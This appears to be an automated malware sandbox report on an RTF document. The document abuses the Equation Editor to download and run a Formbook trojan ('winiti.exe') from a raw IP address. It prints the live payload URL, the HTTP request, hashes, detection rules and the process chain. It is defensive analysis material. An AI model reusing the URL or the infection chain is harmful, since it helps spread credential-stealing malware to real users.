                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{CA433D8B-F591-4001-83B8-CC67CA1B6F25}.tmpJump to behavior
                Source: global trafficHTTP traffic detected: GET /15/winiti.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 104.219.239.104Connection: Keep-Alive
                Source: EQNEDT32.EXE, EQNEDT32.EXE, 00000002.00000002.365668664.000000000067F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.219.239.104/15/winiti.exe
                Source: EQNEDT32.EXE, 00000002.00000002.365668664.000000000067F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.219.239.104/15/winiti.exej
                Source: EQNEDT32.EXE, 00000002.00000002.365668664.000000000067F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.219.239.104/15/winiti.exekkC:

                E-Banking Fraud

                barindex
                Source: Yara matchFile source: 9.2.winiti.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.winiti.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000009.00000002.411080065.0000000000080000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.411140911.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Source: YjYoFznWQI.rtf, type: SAMPLEMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
                Source: 9.2.winiti.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 9.2.winiti.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 00000009.00000002.411080065.0000000000080000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 00000009.00000002.411140911.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\winiti[1].exeJump to dropped file
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\winiti.exeJump to dropped file
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_0042BB43 NtClose,9_2_0042BB43
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_009B07AC NtCreateMutant,LdrInitializeThunk,9_2_009B07AC
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_009AF9F0 NtClose,LdrInitializeThunk,9_2_009AF9F0
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_009AFAE8 NtQueryInformationProcess,LdrInitializeThunk,9_2_009AFAE8
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_009AFB68 NtFreeVirtualMemory,LdrInitializeThunk,9_2_009AFB68
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_009AFDC0 NtQuerySystemInformation,LdrInitializeThunk,9_2_009AFDC0
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_009B00C4 NtCreateFile,9_2_009B00C4
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_009B0048 NtProtectVirtualMemory,9_2_009B0048
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_009B0078 NtResumeThread,9_2_009B0078
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_009B0060 NtQuerySection,9_2_009B0060
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_009B01D4 NtSetValueKey,9_2_009B01D4
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_009B010C NtOpenDirectoryObject,9_2_009B010C
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_009B0C40 NtGetContextThread,9_2_009B0C40
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_009B10D0 NtOpenProcessToken,9_2_009B10D0
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_009B1148 NtOpenThread,9_2_009B1148
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_009AF8CC NtWaitForSingleObject,9_2_009AF8CC
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_009AF900 NtReadFile,9_2_009AF900
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_009AF938 NtWriteFile,9_2_009AF938
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_009B1930 NtSetContextThread,9_2_009B1930
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_009AFAB8 NtQueryValueKey,9_2_009AFAB8
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_009AFAD0 NtAllocateVirtualMemory,9_2_009AFAD0
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_009AFA20 NtQueryInformationFile,9_2_009AFA20
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_009AFA50 NtEnumerateValueKey,9_2_009AFA50
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_009AFBB8 NtQueryInformationToken,9_2_009AFBB8
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_009AFBE8 NtQueryVirtualMemory,9_2_009AFBE8
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_009AFB50 NtCreateKey,9_2_009AFB50
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_009AFC90 NtUnmapViewOfSection,9_2_009AFC90
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_009AFC30 NtOpenProcess,9_2_009AFC30
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_009AFC48 NtSetInformationFile,9_2_009AFC48
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_009AFC60 NtMapViewOfSection,9_2_009AFC60
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_009AFD8C NtDelayExecution,9_2_009AFD8C
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_009B1D80 NtSuspendThread,9_2_009B1D80
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_009AFD5C NtEnumerateKey,9_2_009AFD5C
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_009AFEA0 NtReadVirtualMemory,9_2_009AFEA0
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_009AFED0 NtAdjustPrivilegesToken,9_2_009AFED0
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_009AFE24 NtWriteVirtualMemory,9_2_009AFE24
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_009AFFB4 NtCreateSection,9_2_009AFFB4
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_009AFFFC NtCreateProcessEx,9_2_009AFFFC
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_009AFF34 NtQueueApcThread,9_2_009AFF34
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0068BE8D2_2_0068BE8D
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 5_2_003931405_2_00393140
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 5_2_0039056C5_2_0039056C
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 5_2_0039E1E05_2_0039E1E0
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 5_2_0039E6185_2_0039E618
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 5_2_0039EA505_2_0039EA50
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 5_2_00392EE05_2_00392EE0
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 5_2_0039EF385_2_0039EF38
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 5_2_006812F85_2_006812F8
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_004028309_2_00402830
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_0042E1039_2_0042E103
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_0040FA5A9_2_0040FA5A
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_0040FA639_2_0040FA63
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_004012009_2_00401200
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_004032109_2_00403210
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_004023599_2_00402359
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_004023609_2_00402360
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_00402CE09_2_00402CE0
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_0040DCF99_2_0040DCF9
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_0040FC839_2_0040FC83
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_004025799_2_00402579
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_0040DD039_2_0040DD03
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_004025809_2_00402580
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_004167AE9_2_004167AE
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_004167B39_2_004167B3
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_009BE0C69_2_009BE0C6
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_009BE2E99_2_009BE2E9
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_00A663BF9_2_00A663BF
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_009E63DB9_2_009E63DB
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_009C23059_2_009C2305
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_00A0A37B9_2_00A0A37B
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_00A4443E9_2_00A4443E
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_00A405E39_2_00A405E3
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_009DC5F09_2_009DC5F0
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_00A065409_2_00A06540
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_009C46809_2_009C4680
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_009CE6C19_2_009CE6C1
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_00A626229_2_00A62622
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_00A0A6349_2_00A0A634
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_009CC7BC9_2_009CC7BC
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_009CC85C9_2_009CC85C
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_009E286D9_2_009E286D
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_00A6098E9_2_00A6098E
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_009C29B29_2_009C29B2
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_00A549F59_2_00A549F5
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_009D69FE9_2_009D69FE
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_00A0C9209_2_00A0C920
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_00A6CBA49_2_00A6CBA4
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_00A46BCB9_2_00A46BCB
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_00A62C9C9_2_00A62C9C
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_00A4AC5E9_2_00A4AC5E
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_009F0D3B9_2_009F0D3B
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_009CCD5B9_2_009CCD5B
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_009F2E2F9_2_009F2E2F
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_009DEE4C9_2_009DEE4C
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_00A5CFB19_2_00A5CFB1
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_00A32FDC9_2_00A32FDC
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_009D0F3F9_2_009D0F3F
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_009ED0059_2_009ED005
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_009D905A9_2_009D905A
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_00A3D06D9_2_00A3D06D
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_009C30409_2_009C3040
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_00A4D13F9_2_00A4D13F
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_00A612389_2_00A61238
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_009BF3CF9_2_009BF3CF
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_009C73539_2_009C7353
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_009D14899_2_009D1489
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_009F54859_2_009F5485
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_009FD47D9_2_009FD47D
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_00A635DA9_2_00A635DA
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_009C351F9_2_009C351F
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_00A4579A9_2_00A4579A
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_009F57C39_2_009F57C3
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_00A5771D9_2_00A5771D
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_00A5F8EE9_2_00A5F8EE
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_00A3F8C49_2_00A3F8C4
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_00A4394B9_2_00A4394B
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_00A459559_2_00A45955
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_00A73A839_2_00A73A83
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_009BFBD79_2_009BFBD7
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_00A4DBDA9_2_00A4DBDA
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_009E7B009_2_009E7B00
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_00A5FDDD9_2_00A5FDDD
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_00A4BF149_2_00A4BF14
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_009EDF7C9_2_009EDF7C
                Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\winiti[1].exe 158C8861036425F4E7B9DF9A610A0E23D45A811C2916AA697CB01491B493E539
                Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\winiti.exe 158C8861036425F4E7B9DF9A610A0E23D45A811C2916AA697CB01491B493E539
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: String function: 009BDF5C appears 137 times
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: String function: 00A03F92 appears 132 times
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: String function: 009BE2A8 appears 60 times
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: String function: 00A0373B appears 253 times
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: String function: 00A2F970 appears 84 times
                Source: YjYoFznWQI.rtf, type: SAMPLEMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
                Source: 9.2.winiti.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 9.2.winiti.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 00000009.00000002.411080065.0000000000080000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 00000009.00000002.411140911.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: winiti[1].exe.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: winiti.exe.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 5.2.winiti.exe.21938ac.3.raw.unpack, JwlrlmCCKvmG8rWaC9.csCryptographic APIs: 'CreateDecryptor'
                Source: 5.2.winiti.exe.460000.1.raw.unpack, JwlrlmCCKvmG8rWaC9.csCryptographic APIs: 'CreateDecryptor'
                Source: 5.2.winiti.exe.5020000.6.raw.unpack, nVct438kgTuAYGVuDt.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 5.2.winiti.exe.5020000.6.raw.unpack, W9IPWAqr0MPYr1VvVo.csSecurity API names: _0020.SetAccessControl
                Source: 5.2.winiti.exe.5020000.6.raw.unpack, W9IPWAqr0MPYr1VvVo.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 5.2.winiti.exe.5020000.6.raw.unpack, W9IPWAqr0MPYr1VvVo.csSecurity API names: _0020.AddAccessRule
                Source: 5.2.winiti.exe.35768e8.5.raw.unpack, W9IPWAqr0MPYr1VvVo.csSecurity API names: _0020.SetAccessControl
                Source: 5.2.winiti.exe.35768e8.5.raw.unpack, W9IPWAqr0MPYr1VvVo.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 5.2.winiti.exe.35768e8.5.raw.unpack, W9IPWAqr0MPYr1VvVo.csSecurity API names: _0020.AddAccessRule
                Source: 5.2.winiti.exe.34ef6c8.4.raw.unpack, nVct438kgTuAYGVuDt.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 5.2.winiti.exe.35768e8.5.raw.unpack, nVct438kgTuAYGVuDt.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 5.2.winiti.exe.34ef6c8.4.raw.unpack, W9IPWAqr0MPYr1VvVo.csSecurity API names: _0020.SetAccessControl
                Source: 5.2.winiti.exe.34ef6c8.4.raw.unpack, W9IPWAqr0MPYr1VvVo.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 5.2.winiti.exe.34ef6c8.4.raw.unpack, W9IPWAqr0MPYr1VvVo.csSecurity API names: _0020.AddAccessRule
                Source: classification engineClassification label: mal100.troj.expl.evad.winRTF@13/9@0/1
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$YoFznWQI.rtfJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeMutant created: NULL
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR8574.tmpJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: YjYoFznWQI.rtfReversingLabs: Detection: 50%
                Source: YjYoFznWQI.rtfVirustotal: Detection: 55%
                Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\winiti.exe "C:\Users\user\AppData\Roaming\winiti.exe"
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess created: C:\Users\user\AppData\Roaming\winiti.exe "C:\Users\user\AppData\Roaming\winiti.exe"
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess created: C:\Users\user\AppData\Roaming\winiti.exe "C:\Users\user\AppData\Roaming\winiti.exe"
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess created: C:\Users\user\AppData\Roaming\winiti.exe "C:\Users\user\AppData\Roaming\winiti.exe"
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess created: C:\Users\user\AppData\Roaming\winiti.exe "C:\Users\user\AppData\Roaming\winiti.exe"
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\winiti.exe "C:\Users\user\AppData\Roaming\winiti.exe" Jump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess created: C:\Users\user\AppData\Roaming\winiti.exe "C:\Users\user\AppData\Roaming\winiti.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess created: C:\Users\user\AppData\Roaming\winiti.exe "C:\Users\user\AppData\Roaming\winiti.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess created: C:\Users\user\AppData\Roaming\winiti.exe "C:\Users\user\AppData\Roaming\winiti.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess created: C:\Users\user\AppData\Roaming\winiti.exe "C:\Users\user\AppData\Roaming\winiti.exe"Jump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: version.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: secur32.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winhttp.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: webio.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winnsi.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: nlaapi.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc6.dllJump to behavior
